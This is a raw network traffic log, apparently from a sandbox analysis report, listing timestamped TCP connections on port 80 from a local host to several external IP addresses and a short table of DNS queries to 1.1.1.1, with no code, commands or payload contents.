                                                          Jan 11, 2025 01:40:14.509257078 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.509273052 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.509287119 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.509300947 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.509309053 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.509309053 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.509315014 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.509330034 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.509351015 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.509351015 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.511373997 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.514245033 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.514260054 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.514276028 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.514288902 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.514317989 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.514424086 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.614778996 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.614798069 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.614813089 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.614825964 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.614840984 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.615044117 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.615067005 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.615081072 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.615089893 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.615089893 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.615093946 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.615108013 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.615151882 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.615151882 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.615614891 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.615638971 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.615653038 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.615690947 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.615705013 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.615719080 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.615736961 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.615736961 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.616354942 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.616594076 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.616633892 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.616647005 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.616679907 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.616693974 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.616708040 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.616724014 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.616724014 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.616749048 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.617598057 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.617613077 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.617822886 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.703109980 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.703134060 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.703300953 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.718902111 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.718920946 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.718936920 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.718950987 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.718965054 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.719032049 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.719065905 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.719079971 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.719094038 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.719104052 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.719104052 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.719439030 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.719470978 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.719485044 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.719485998 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.719500065 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.719515085 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.719556093 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.719556093 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.719949007 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.719984055 CET8049972134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:14.720026970 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:14.720026970 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:15.190885067 CET4997280192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:16.210045099 CET4998080192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:16.214972973 CET8049980134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:16.215092897 CET4998080192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:16.224611044 CET4998080192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:16.229520082 CET8049980134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:17.051168919 CET8049980134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:17.051198006 CET8049980134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:17.051516056 CET4998080192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:17.056158066 CET4998080192.168.2.5134.0.14.158
                                                          Jan 11, 2025 01:40:17.060957909 CET8049980134.0.14.158192.168.2.5
                                                          Jan 11, 2025 01:40:22.523077011 CET4998180192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:22.527944088 CET8049981103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:22.528079033 CET4998180192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:22.543145895 CET4998180192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:22.547967911 CET8049981103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:23.160283089 CET8049981103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:23.160391092 CET8049981103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:23.160612106 CET4998180192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:24.050271988 CET4998180192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:25.069036961 CET4998280192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:25.074013948 CET8049982103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:25.074361086 CET4998280192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:25.088967085 CET4998280192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:25.093801022 CET8049982103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:25.706581116 CET8049982103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:25.706823111 CET8049982103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:25.706983089 CET4998280192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:26.597135067 CET4998280192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:27.634959936 CET4998380192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:27.639852047 CET8049983103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:27.639923096 CET4998380192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:27.690835953 CET4998380192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:27.695764065 CET8049983103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:27.695842981 CET8049983103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:28.282422066 CET8049983103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:28.282605886 CET8049983103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:28.282666922 CET4998380192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:29.206482887 CET4998380192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:30.319403887 CET4998480192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:30.324321032 CET8049984103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:30.324420929 CET4998480192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:30.335510969 CET4998480192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:30.340413094 CET8049984103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:30.942756891 CET8049984103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:30.942800999 CET8049984103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:30.942836046 CET8049984103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:30.942919016 CET4998480192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:30.942941904 CET4998480192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:30.949203014 CET4998480192.168.2.5103.224.182.242
                                                          Jan 11, 2025 01:40:30.954119921 CET8049984103.224.182.242192.168.2.5
                                                          Jan 11, 2025 01:40:36.081255913 CET4998680192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:36.086194038 CET8049986185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:36.086280107 CET4998680192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:36.101294041 CET4998680192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:36.107263088 CET8049986185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:36.707600117 CET8049986185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:36.707652092 CET8049986185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:36.707712889 CET4998680192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:37.612787962 CET4998680192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:38.632008076 CET4998780192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:38.636989117 CET8049987185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:38.637106895 CET4998780192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:38.651045084 CET4998780192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:38.655929089 CET8049987185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:39.254297972 CET8049987185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:39.254354954 CET8049987185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:39.254585028 CET4998780192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:40.159678936 CET4998780192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:41.178842068 CET4998880192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:41.183831930 CET8049988185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:41.184000969 CET4998880192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:41.198714018 CET4998880192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:41.203711987 CET8049988185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:41.203823090 CET8049988185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:41.791675091 CET8049988185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:41.791768074 CET8049988185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:41.791873932 CET4998880192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:42.706743002 CET4998880192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:43.726598978 CET4998980192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:43.731559038 CET8049989185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:43.731784105 CET4998980192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:43.744018078 CET4998980192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:43.748924017 CET8049989185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:44.442990065 CET8049989185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:44.443028927 CET8049989185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:44.443344116 CET4998980192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:44.473910093 CET4998980192.168.2.5185.27.134.206
                                                          Jan 11, 2025 01:40:44.478835106 CET8049989185.27.134.206192.168.2.5
                                                          Jan 11, 2025 01:40:50.732738018 CET4999080192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:50.737679005 CET8049990165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:50.737772942 CET4999080192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:50.752645016 CET4999080192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:50.757530928 CET8049990165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:51.699592113 CET8049990165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:51.699661016 CET8049990165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:51.699826956 CET4999080192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:51.699884892 CET8049990165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:51.699940920 CET4999080192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:52.269153118 CET4999080192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:53.288316011 CET4999180192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:53.293275118 CET8049991165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:53.293440104 CET4999180192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:53.310786963 CET4999180192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:53.315599918 CET8049991165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:54.241890907 CET8049991165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:54.241940022 CET8049991165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:54.242021084 CET4999180192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:54.242515087 CET8049991165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:54.242592096 CET4999180192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:54.816051960 CET4999180192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:55.834938049 CET4999280192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:55.839874983 CET8049992165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:55.840013981 CET4999280192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:55.854413986 CET4999280192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:55.859380960 CET8049992165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:55.859476089 CET8049992165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:56.783948898 CET8049992165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:56.783994913 CET8049992165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:56.784033060 CET8049992165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:56.784250021 CET4999280192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:56.784250021 CET4999280192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:57.363176107 CET4999280192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:58.382175922 CET4999380192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:58.387264013 CET8049993165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:58.387517929 CET4999380192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:58.396231890 CET4999380192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:58.401103020 CET8049993165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:59.308166981 CET8049993165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:59.308187962 CET8049993165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:59.308203936 CET8049993165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:40:59.308353901 CET4999380192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:59.311603069 CET4999380192.168.2.5165.154.96.210
                                                          Jan 11, 2025 01:40:59.316461086 CET8049993165.154.96.210192.168.2.5
                                                          Jan 11, 2025 01:41:04.349435091 CET4999480192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:04.354367971 CET804999445.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:04.357517004 CET4999480192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:04.371803045 CET4999480192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:04.376727104 CET804999445.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:05.054543018 CET804999445.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:05.054567099 CET804999445.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:05.054646015 CET4999480192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:05.894686937 CET4999480192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:06.913566113 CET4999580192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:07.686039925 CET804999545.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:07.686300993 CET4999580192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:07.700984001 CET4999580192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:07.705898046 CET804999545.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:08.353347063 CET804999545.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:08.353610039 CET804999545.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:08.353766918 CET4999580192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:09.206530094 CET4999580192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:10.225852966 CET4999680192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:10.230868101 CET804999645.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:10.233438015 CET4999680192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:10.248625040 CET4999680192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:10.253547907 CET804999645.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:10.253896952 CET804999645.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:10.924496889 CET804999645.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:10.924592972 CET804999645.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:10.924832106 CET4999680192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:11.758462906 CET4999680192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:12.773152113 CET4999780192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:12.778126955 CET804999745.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:12.781433105 CET4999780192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:12.794153929 CET4999780192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:12.799050093 CET804999745.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:13.641216993 CET804999745.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:13.641277075 CET804999745.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:13.641402960 CET4999780192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:13.645426989 CET4999780192.168.2.545.141.156.114
                                                          Jan 11, 2025 01:41:13.650233984 CET804999745.141.156.114192.168.2.5
                                                          Jan 11, 2025 01:41:19.223220110 CET4999880192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:19.228140116 CET804999827.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:19.228250980 CET4999880192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:19.241024017 CET4999880192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:19.245970011 CET804999827.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:20.034018993 CET804999827.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:20.081417084 CET4999880192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:20.125915051 CET804999827.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:20.125982046 CET4999880192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:20.753437042 CET4999880192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:21.771733999 CET4999980192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:21.776674032 CET804999927.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:21.776767969 CET4999980192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:21.791549921 CET4999980192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:21.796505928 CET804999927.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:22.566281080 CET804999927.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:22.612687111 CET4999980192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:22.659581900 CET804999927.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:22.659688950 CET4999980192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:23.300276041 CET4999980192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:24.320291996 CET5000080192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:24.325153112 CET805000027.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:24.325262070 CET5000080192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:24.346798897 CET5000080192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:24.351639032 CET805000027.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:24.351771116 CET805000027.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:25.126048088 CET805000027.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:25.175349951 CET5000080192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:25.217174053 CET805000027.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:25.217345953 CET5000080192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:25.862828016 CET5000080192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:26.882843971 CET5000180192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:26.887823105 CET805000127.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:26.887989044 CET5000180192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:26.898700953 CET5000180192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:26.903597116 CET805000127.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:27.652823925 CET805000127.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:27.706404924 CET5000180192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:27.741023064 CET805000127.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:27.741170883 CET5000180192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:27.741975069 CET5000180192.168.2.527.124.4.246
                                                          Jan 11, 2025 01:41:27.746752024 CET805000127.124.4.246192.168.2.5
                                                          Jan 11, 2025 01:41:32.772695065 CET5000280192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:32.777578115 CET8050002188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:41:32.777673960 CET5000280192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:32.791568041 CET5000280192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:32.796536922 CET8050002188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:41:34.301729918 CET5000280192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:34.306956053 CET8050002188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:41:34.307061911 CET5000280192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:35.318882942 CET5000380192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:35.323939085 CET8050003188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:41:35.324115038 CET5000380192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:35.338614941 CET5000380192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:35.343564034 CET8050003188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:41:36.847208977 CET5000380192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:36.853149891 CET8050003188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:41:36.853255987 CET5000380192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:37.897114038 CET5000480192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:37.902000904 CET8050004188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:41:37.902110100 CET5000480192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:37.919285059 CET5000480192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:37.924058914 CET8050004188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:41:37.924206018 CET8050004188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:41:39.425416946 CET5000480192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:39.430444002 CET8050004188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:41:39.431514025 CET5000480192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:40.528273106 CET5000580192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:40.533178091 CET8050005188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:41:40.533289909 CET5000580192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:40.592025042 CET5000580192.168.2.5188.114.96.3
                                                          Jan 11, 2025 01:41:40.597012043 CET8050005188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:42:19.974260092 CET8050005188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:42:19.974771976 CET8050005188.114.96.3192.168.2.5
                                                          Jan 11, 2025 01:42:19.974838972 CET5000580192.168.2.5188.114.96.3
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 11, 2025 01:39:52.780023098 CET4944453192.168.2.51.1.1.1
                                                          Jan 11, 2025 01:39:52.798819065 CET53494441.1.1.1192.168.2.5
                                                          Jan 11, 2025 01:40:08.538233042 CET6476453192.168.2.51.1.1.1
                                                          Jan 11, 2025 01:40:08.570329905 CET53647641.1.1.1192.168.2.5
                                                          Jan 11, 2025 01:40:22.070087910 CET5084153192.168.2.51.1.1.1
                                                          Jan 11, 2025 01:40:22.520380020 CET53508411.1.1.1192.168.2.5
                                                          Jan 11, 2025 01:40:35.960539103 CET6500253192.168.2.51.1.1.1
                                                          Jan 11, 2025 01:40:36.078814030 CET53650021.1.1.1192.168.2.5
                                                          Jan 11, 2025 01:40:49.492259979 CET5077953192.168.2.51.1.1.1
                                                          Jan 11, 2025 01:40:50.487972975 CET5077953192.168.2.51.1.1.1
                                                          Jan 11, 2025 01:40:50.730216980 CET53507791.1.1.1192.168.2.5
                                                          Jan 11, 2025 01:40:50.730252028 CET53507791.1.1.1192.168.2.5
                                                          Jan 11, 2025 01:41:04.319333076 CET5249053192.168.2.51.1.1.1
                                                          Jan 11, 2025 01:41:04.346596003 CET53524901.1.1.1192.168.2.5
                                                          Jan 11, 2025 01:41:18.662542105 CET6118953192.168.2.51.1.1.1
                                                          Jan 11, 2025 01:41:19.220487118 CET53611891.1.1.1192.168.2.5
                                                          Jan 11, 2025 01:41:32.758327961 CET6327353192.168.2.51.1.1.1
